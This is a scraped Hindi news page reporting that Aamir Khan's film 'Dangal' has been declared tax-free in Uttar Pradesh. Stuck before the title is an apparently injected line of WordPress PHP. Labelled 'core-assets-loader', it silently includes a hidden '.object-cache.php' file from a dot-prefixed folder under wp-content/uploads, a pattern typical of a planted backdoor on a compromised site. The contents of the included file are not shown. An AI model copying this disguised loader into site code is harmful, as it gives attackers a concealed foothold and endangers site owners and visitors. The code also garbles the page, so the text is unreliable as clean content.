add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); यूपी में टैक्स फ्री हुई सुपरस्टार आमिर खान की फिल्म ‘दंगल’ – SOCH INDIA
Menu

मनोरंजन
यूपी में टैक्स फ्री हुई सुपरस्टार आमिर खान की फिल्म ‘दंगल’

nobanner

सुपरस्टार आमिर खान की बहुप्रतिक्षित फिल्म ‘दंगल’ को उत्तर प्रदेश में टैक्स फ्री कर दिया गया है. हाल ही में यूपी सीएम अखिलेश यादव ने फिल्म को टैक्स फ्री किए जाने की घोषणा की थी.

‘दंगल’ को टैक्स फ्री किए जाने का मतलब है कि राज्य भर में अब टिकट सस्ते मिलेंगे जिस वजह से ज्यादा से ज्यादा दर्शक फिल्म को देखने पहुंचेंगे.

आमिर खान की फिल्म ‘दंगल’ एक पिता और उसकी बेटियों की कहानी है जो अपने बेटियों को कुछ बनाकर अपने सपने पूरा करना चाहते हैं. ‘दंगल’ फिल्म के ट्रेलर को अब तक तीन करोड़ से ज्यादा बार देखा जा चुका है.

आपको बता दें कि ‘दंगल’ भारतीय खेल कुश्ती पर आधारित एक फिल्म है. इसमें आमिर खान महावीर सिंह फोगट की भूमिका में दिखाई देंगे. फिल्म 23 दिसंबर को रिलीज हो रही है.